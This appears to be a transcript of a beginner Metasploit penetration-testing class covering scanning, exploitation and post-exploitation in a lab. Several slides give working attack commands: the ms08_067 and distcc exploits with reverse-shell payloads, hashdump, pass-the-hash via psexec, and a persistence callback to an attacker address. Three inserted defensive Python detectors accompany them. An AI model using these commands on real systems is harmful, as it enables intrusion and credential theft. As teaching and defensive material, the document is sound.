Metasploit for Penetration Testing: Beginner Class



Slides for the beginning Metasploit class.



© All Rights Reserved
Metasploit for Penetration Testing: Beginner Class Presentation Transcript

  • 1. Penetration Testing with Metasploit
    Georgia Weidman
  • 2. Acknowledgements
    • Metasploit Team
    • Offensive Security/Metasploit Unleashed
    • Hackers for Charity
    • David Kennedy
    • BSides Delaware Crew
    • Darren
  • 3. Agenda
    • Metasploit Basics
      – Some terminology/brief intro to pentesting
      – How Metasploit works
      – Interacting with Metasploit
    • Basic Exploitation
      – Exploiting a vulnerability using Metasploit console
    • Using Meterpreter
      – Using the Meterpreter shell for post exploitation
  • 4. Agenda
    • Metasploit in a penetration test
      – Information Gathering
      – Vulnerability Scanning
      – Exploitation in depth
      – Post exploitation
      – Reporting
    • Hack some stuff
      – Pop my boxes
  • 5. Connecting
    Wireless access point SSID: IgnatiusRiley
    Password: metasploit
  • 6. What’s in the lab?
    • Windows XP SP2
      – IP address:
    • Ubuntu Linux 8.04 (Metasploitable)
      – IP address:
    Others below .100 (.100 and above are you guys)
  • 7. What is Penetration Testing?
    Simulation of a real attack
    Get out of jail free card for exploiting systems
    Report to customers with findings and recommendations
    Find and remediate vulnerabilities before attackers exploit them
  • 8. What is Metasploit?
    Exploitation framework
    Ruby based
    Modular
    Exploits, payloads, auxiliaries, and more
  • 9. Metasploit Terminology
    Exploit: vector for penetrating the system
    Payload: shellcode, what you want the exploit to do
    Encoders: encode or mangle payload
    Auxiliary: other modules besides exploitation
    Session: connection from a successful exploit
  • 10. Metasploit Interfaces
    Msfconsole
    Msfcli
    Msfweb, Msfgui (discontinued)
    Metasploit Pro, Metasploit Express
    Armitage
  • 11. Exploitation Streamlining
    • Traditional Pentest:
      – Find public exploit
      – Change offsets and return address for your target
      – Replace shellcode
    • Metasploit:
      – Load Metasploit module
      – Select target OS
      – Set IP addresses
      – Select payload
  • 12. Using Msfconsole: Exploitation
    use <module> - sets exploit/auxiliary/etc. to use
    set <x X> - set a parameter
    setg <x X> - set a parameter globally
    show <x> - lists all available x
    exploit - runs the selected module
  • 13. Windows Exploitation Example
    search windows/smb
    info windows/smb/ms08_067_netapi
    use windows/smb/ms08_067_netapi
    show payloads
    set payload windows/meterpreter/reverse_tcp
    show options
    set lhost (set other options as well)
    exploit
  • 14. MSFcli Exploitation Example
    ./msfcli <exploit> <option=x> E
    Example: msfcli windows/smb/ms08_067_netapi RHOST= LHOST= E
    E = exploit
    O = show options
    P = show payloads
  • 15. Linux Exploitation Example
    search distcc
    use unix/misc/distcc_exec
    show payloads
    set payload cmd/unix/reverse
    show options
    set rhost
    set lhost (your ip)
    exploit
  • 16. Sessions
    sessions -l lists all active sessions
    sessions -i <id> interact with a given session
  • 17. Meterpreter
    Gain a session using a meterpreter payload
    Memory based/never hits the disk
    Everything a shell can do plus extra
  • 18. Meterpreter Commands
    help - shows all available commands
    background - backgrounds the session
    ps - shows all processes
    migrate <process id> - moves meterpreter to another process
    getuid - shows the user
  • 19. Meterpreter Commands
    download <file> - pulls a file from the victim
    upload <file on attacker> <file on victim> - pushes a file to the victim
    hashdump - dumps the hashes from the SAM
    shell - drops you in a shell
  • 20. Exercise
    In Msfconsole use ms08_067_netapi to get a reverse meterpreter shell on the Windows XP machine.
    Experiment with different payloads and meterpreter commands.
  • 21. Information Gathering
    Learning as much about a target as possible
    Examples: open ports, running services, installed software
    Identify points for further exploration
  • 22. Metasploit and Databases
    Metasploit supports MySQL and PostgreSQL
    /etc/init.d/postgresql-8.4 start (starts PostgreSQL)
    msf > db_connect postgres:password@ (connects to database server and creates database metasploit)
  • 23. Portscanning
    Queries a host to see if a program is listening
    Ex: Browsing to a website - webserver listens on port 80
    Listening ports are accessible by an attacker and if vulnerable may be used for exploitation
    Ex: ms08_067_netapi exploits SMB on port 445
  • 24. Metasploit and nmap
    Port scanning and just about everything else: man nmap
    Ex: nmap -sV -oA subnet1 (TCP version scan, all hosts 192.168.20.X, outputs multiple formats beginning with subnet1)
    msf > db_import subnet1.xml
  • 25. MSF Auxiliary Portscanners
    msf > search portscan (shows portscan modules)
    scanner/portscan/tcp (runs a TCP syn scan)
    Use auxiliary modules like exploits (use, set, exploit, etc.)
  • 26. Some Other MSF Scanners
    scanner/smb/smb_version (scans port 445 for the SMB version, good way to get OS version)
    scanner/ssh/ssh_version (queries the SSH version)
    scanner/ftp/anonymous (anonymous FTP login)
  • 27. Vulnerability Scanning
    Query systems for potential vulnerabilities
    Identify potential methods of penetration
    Ex: SMB version scan in information gathering returned port 445 open and target Windows XP SP2, scan for ms08_067_netapi vulnerability
  • 28. Metasploit and Nessus
    Tenable's vulnerability scanner
    msf > load nessus
    msf > nessus_connect student1:password@ ok (ok says no ssl is ok)
    msf > nessus_policy_list
    msf > nessus_scan_new -4 pwnage <ip range> (scan using policy one, name it pwnage)
    msf > nessus_report_list
    msf > nessus_report_get <report id>
  • 29. Metasploit Vulnerability Scanners
    SMB Login: given a set of credentials, what systems can they access?
      scanner/smb/smb_login
    Open VNC and X11: if misconfigured may be accessible without credentials
      scanner/vnc/vnc_none_auth
      scanner/x11/open_x11
  • 30. Using Msfconsole: Exploitation
    use <module> - sets exploit/auxiliary/etc. to use
    set <x X> - set a parameter
    setg <x X> - set a parameter globally
    show <x> - lists all available x
    exploit - runs the selected module
  • 31. Our Database
    hosts
    services
    vulns
    -c select columns
    -s search for specific string
  • 32. db_autopwn
    By default just runs all the exploits that match a given open port
    Not stealthy
    Using vulnerability data can be made smarter, matches vulnerabilities instead of ports
    db_autopwn -x -e
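Slides 24 to 32 describe the same loop a defender runs against their own network: scan with nmap -sV -oA, import the .xml file, and decide what matters by looking at the service data rather than the bare port list (the distinction the db_autopwn slide draws). The following is an added example for this transcript, not code from the class or from Metasploit: it parses the nmap XML format that db_import reads and turns it into a prioritised remediation list. The XML document is constructed, and the table of checks is an assumption built only from the module names and the XP SP2 / port 445 reasoning the slides give.

```python
"""Parse nmap -sV XML output (the file msfconsole's db_import consumes) and match each
open service against a small table of checks, producing a ranked list for remediation.

Added example for the class transcript; not the class's or Metasploit's own code.
SAMPLE_NMAP_XML is constructed and CHECKS is an illustrative assumption.
"""
import xml.etree.ElementTree as ET

# Constructed nmap -sV output for two lab-style hosts (addresses from the
# documentation range 192.0.2.0/24, not real targets).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oA subnet1 192.0.2.0/24">
  <host>
    <status state="up"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="139"><state state="open"/>
        <service name="netbios-ssn" product="Microsoft Windows netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/>
        <service name="microsoft-ds" product="Microsoft Windows XP microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="closed"/></port>
    </ports>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.0.2.20" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/>
        <service name="ftp" product="vsftpd" version="2.3.4"/></port>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="4.7p1"/></port>
      <port protocol="tcp" portid="3632"><state state="open"/>
        <service name="distccd" product="distccd" version="v1"/></port>
      <port protocol="tcp" portid="6000"><state state="open"/>
        <service name="X11"/></port>
    </ports>
  </host>
</nmaprun>
"""

# Assumed check table: (port, substring the banner must contain or None, finding, severity).
# The finding text names the Metasploit module the slides list for that service.
CHECKS = [
    (445,  "Windows XP", "ms08_067_netapi: SMB on Windows XP, confirm patch level", "critical"),
    (3632, None,         "distcc_exec: distccd reachable from the network",          "critical"),
    (6000, None,         "open_x11: X11 listener, verify access control",            "high"),
    (5900, None,         "vnc_none_auth: VNC listener, verify authentication",       "high"),
    (21,   None,         "ftp/anonymous: verify anonymous login is disabled",        "medium"),
    (22,   None,         "ssh_version: confirm the SSH version is still supported",  "low"),
]
SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3}


def parse_nmap_xml(xml_text):
    """Return (ip, port, service name, banner) for every open TCP port on every live host."""
    root = ET.fromstring(xml_text)
    services = []
    for host in root.findall("host"):
        if host.find("status").get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']").get("addr")
        for port in host.findall("ports/port"):
            if port.find("state").get("state") != "open":
                continue
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            parts = (svc.get("product"), svc.get("version")) if svc is not None else ()
            banner = " ".join(p for p in parts if p)
            services.append((addr, int(port.get("portid")), name, banner))
    return services


def match_exposures(services):
    """Match on port plus banner, so a 445 listener that is not Windows XP is not flagged."""
    findings = []
    for ip, port, _name, banner in services:
        for chk_port, needle, label, severity in CHECKS:
            if port != chk_port or (needle is not None and needle not in banner):
                continue
            findings.append({"host": ip, "port": port, "finding": label, "severity": severity})
    findings.sort(key=lambda f: (SEVERITY_RANK[f["severity"]], f["host"], f["port"]))
    return findings


def report(xml_text):
    return match_exposures(parse_nmap_xml(xml_text))


if __name__ == "__main__":
    for f in report(SAMPLE_NMAP_XML):
        print(f"{f['severity']:8} {f['host']}:{f['port']:<5} {f['finding']}")
```

Swap SAMPLE_NMAP_XML for the contents of subnet1.xml from a real scan of your own network and the same code yields the list to hand to whoever patches; extend CHECKS from your vulnerability scanner's output rather than from a fixed table when you have one.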
  • 33. Attacking MSSQL
    MSSQL TCP port can change, UDP port is 1434
    msf > search mssql (shows all mssql modules)
    msf > use scanner/mssql/mssql_ping (queries UDP 1434 for information including TCP port)
    msf > use scanner/mssql/mssql_login (tries passwords to log into mssql)
    msf > use windows/mssql/mssql_payload (logs into mssql and gets a shell)
  • 34. We have a shell, now what?
    Privilege escalation
    Local information gathering
    Exploiting additional hosts
    Maintaining access
    Forensic avoidance
  • 35. Meterpreter: Privilege Escalation
    A session has the privileges of the exploited process
    getuid (tells you what user your session is running as)
    getsystem (tries various techniques to escalate privileges)
  • 36. Meterpreter: Enabling Remote Desktop
    Turn on remote desktop, get it through the firewall, put a user in the remote desktop users group
    run getgui -e
  • 37. Meterpreter: Migrating
    If the process that hosts meterpreter closes, meterpreter dies too
    Example: client side exploit residing in the browser
    meterpreter > ps (shows all processes)
    meterpreter > migrate <process id> (moves to a new process)
  • 38. Meterpreter: Searching for Content
    Look for specific interesting files on the exploited system
    search -h
    Example: search -f *.jpg (finds all the porn)
  • 39. Pivoting
    Scenario: Exploit a dual networked host, with a routable interface and a non-routable one. Can we attack other hosts on the non-routable interface without SSH tunneling?
    route add 1 (routes traffic to the subnet through session 1)
    Now you can portscan, exploit, etc. the non-routable subnet
  • 40. PSExec
    hashdump (dumps the hashes, not always easy to crack)
    Why not just pass the hash to other systems?
    use windows/smb/psexec
    set SMBPass to the hash
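Slide 40 is the point in the deck where one compromised host turns into many: a dumped hash is replayed over SMB to other systems, and the psexec module executes on each of them through the service manager. From the defender's side that activity is visible in two places, the Security log (Event 4624 network logons authenticated with NTLM, one source address reaching many computers with one account) and the System log (Event 7045, a service installed seconds after such a logon). The following is an added example for this transcript, not code from the class or from Metasploit; the event records and service name are constructed, the field names follow the EventData names Windows uses for these events, and the three-host / five-minute / sixty-second thresholds are assumptions to tune for your own environment.

```python
"""Hunt for pass-the-hash style lateral movement in Windows event records.

Added example for the class transcript; not the class's or Metasploit's own code.
EVENTS is constructed; thresholds are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def logon(computer, user, ip, package, when, logon_type=3):
    """Security log 4624 record (fields as in its EventData section)."""
    return {"EventID": 4624, "Computer": computer, "LogonType": logon_type,
            "AuthenticationPackageName": package, "TargetUserName": user,
            "IpAddress": ip, "Time": ts(when)}


def service_install(computer, name, image, when):
    """System log 7045 record: 'A service was installed in the system'."""
    return {"EventID": 7045, "Computer": computer, "ServiceName": name,
            "ImagePath": image, "Time": ts(when)}


# Constructed events. Ordinary file-server traffic, then one address reusing one local
# administrator account against four workstations in half a minute, with a service
# appearing on the first of them three seconds after the logon.
EVENTS = [
    logon("FS01", "alice", "10.0.0.50", "NTLM", "2012-05-01 09:00:01"),
    logon("FS01", "bob", "10.0.0.51", "Kerberos", "2012-05-01 09:00:05"),
    logon("FS01", "alice", "10.0.0.50", "NTLM", "2012-05-01 09:03:40"),
    logon("WS02", "Administrator", "10.0.0.77", "NTLM", "2012-05-01 09:10:00"),
    service_install("WS02", "GkDhtQxM", r"%SystemRoot%\GkDhtQxM.exe", "2012-05-01 09:10:03"),
    logon("WS03", "Administrator", "10.0.0.77", "NTLM", "2012-05-01 09:10:10"),
    logon("WS04", "Administrator", "10.0.0.77", "NTLM", "2012-05-01 09:10:20"),
    logon("WS05", "Administrator", "10.0.0.77", "NTLM", "2012-05-01 09:10:31"),
    # a legitimate agent install with no network logon in front of it
    service_install("FS01", "BackupAgent", r"C:\Program Files\Backup\agent.exe", "2012-05-01 09:30:00"),
]


def ntlm_network_logons(events):
    """4624 with LogonType 3 and NTLM: the shape a replayed hash produces, because NTLM
    authenticates with the hash itself and never needs the password."""
    return [e for e in events if e["EventID"] == 4624 and e["LogonType"] == 3
            and e["AuthenticationPackageName"] == "NTLM"]


def fanout_alerts(events, window=timedelta(minutes=5), min_hosts=3):
    """Flag a (source address, account) pair that reaches >= min_hosts distinct computers
    with NTLM network logons inside one sliding window of length `window`."""
    groups = defaultdict(list)
    for e in ntlm_network_logons(events):
        groups[(e["IpAddress"], e["TargetUserName"])].append(e)
    alerts = []
    for (ip, user), logons in groups.items():
        logons.sort(key=lambda e: e["Time"])
        for i, first in enumerate(logons):
            hosts = {e["Computer"] for e in logons[i:] if e["Time"] - first["Time"] <= window}
            if len(hosts) >= min_hosts:
                alerts.append({"source": ip, "user": user, "hosts": sorted(hosts),
                               "start": first["Time"]})
                break  # one alert per pair is enough
    return alerts


def service_after_logon(events, max_gap=timedelta(seconds=60)):
    """Pair a 7045 with an NTLM network logon on the same computer in the preceding
    max_gap: remote execution through the service manager leaves exactly this pair."""
    logons = ntlm_network_logons(events)
    hits = []
    for svc in (e for e in events if e["EventID"] == 7045):
        for lg in logons:
            gap = svc["Time"] - lg["Time"]
            if lg["Computer"] == svc["Computer"] and timedelta(0) <= gap <= max_gap:
                hits.append({"host": svc["Computer"], "service": svc["ServiceName"],
                             "image": svc["ImagePath"], "user": lg["TargetUserName"],
                             "source": lg["IpAddress"]})
                break
    return hits


def hunt(events):
    return {"fanout": fanout_alerts(events), "service_exec": service_after_logon(events)}


if __name__ == "__main__":
    for kind, alerts in hunt(EVENTS).items():
        for a in alerts:
            print(kind, a)
```

The fan-out rule is the cheaper one to run continuously; the 7045 correlation needs the System log from the destination hosts, which is also where the image path tells you whether the service is one you deploy. Both rules assume the source address is stable, so feed them records from the same collection window.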
  • 41. Meterpreter: Persistence
    Persistence script installs a meterpreter service
    Meterpreter comes back when the box restarts
    Ex: run persistence -U -i 5 -p 443 -r (respawns on login, at a 5 second interval on port 443 to ip)
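The persistence agent on slide 41 gives itself away by its timing: -i 5 makes it reconnect to the same address (-r) and port (-p 443) every five seconds, so in a firewall or flow log the flow repeats with near-constant gaps, unlike a user's browsing, which is bursty even on the same port. The following is an added example for this transcript, not code from the class or from Metasploit: it groups connection records by source, destination and port and scores each group's inter-connection gaps by coefficient of variation (standard deviation over mean). The flow records are constructed and the two thresholds (at least eight connections, CV at most 0.2) are assumptions.

```python
"""Find a persistence callback in connection logs by the regularity of its timing.

Added example for the class transcript; not the class's or Metasploit's own code.
FLOWS is constructed; min_connections and max_cv are assumed thresholds.
"""
from collections import defaultdict
from statistics import mean, pstdev


def _constructed_flows():
    """(seconds since log start, source host, destination, destination port)."""
    rows = []
    # the agent: a connection every ~5 s (-i 5) to one address on 443 (-p 443)
    for t in [0.0, 5.1, 10.0, 14.9, 20.2, 25.0, 29.8, 35.1, 40.0, 45.1, 49.9, 55.0]:
        rows.append((t, "10.0.0.77", "203.0.113.5", 443))
    # a user browsing: same port, twelve connections, bursty and irregular
    for t in [0.0, 1.2, 1.9, 30.0, 31.0, 95.0, 96.5, 200.0, 260.0, 261.0, 262.0, 400.0]:
        rows.append((t, "10.0.0.50", "198.51.100.8", 443))
    # too few connections to judge either way
    for t in [0.0, 5.0, 10.0]:
        rows.append((t, "10.0.0.51", "203.0.113.9", 443))
    return sorted(rows)


FLOWS = _constructed_flows()


def find_beacons(flows, min_connections=8, max_cv=0.2):
    """Group by (src, dst, port). A group whose gaps between connections have a small
    coefficient of variation (pstdev / mean) is repeating on a timer, not on a person."""
    by_flow = defaultdict(list)
    for t, src, dst, port in flows:
        by_flow[(src, dst, port)].append(t)
    beacons = []
    for (src, dst, port), times in by_flow.items():
        if len(times) < min_connections:
            continue  # not enough samples for the statistic to mean anything
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue  # all connections in the same instant: a burst, not a beacon
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            beacons.append({"src": src, "dst": dst, "port": port, "count": len(times),
                            "interval": round(avg, 2), "cv": round(cv, 3)})
    return beacons


if __name__ == "__main__":
    for b in find_beacons(FLOWS):
        print(f"{b['src']} -> {b['dst']}:{b['port']} every {b['interval']}s "
              f"(cv {b['cv']}, {b['count']} connections)")
```

Lowering min_connections catches a beacon sooner but also admits short, regular flows that happen by chance (the three-connection flow above qualifies at min_connections=3), so pick the floor from how long you are willing to let an implant run before it is noticed. Note that the agent keeps connecting whether or not anything is listening, so blocked attempts in the firewall log are just as periodic as successful ones.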
  • 42. Exercises
    Perform a penetration test on the Windows and Linux systems we used in class
    Perform a penetration test on the lab network
  • 43. Contact Georgia Weidman
    Website:
    Email:
    Twitter: @vincentkadmon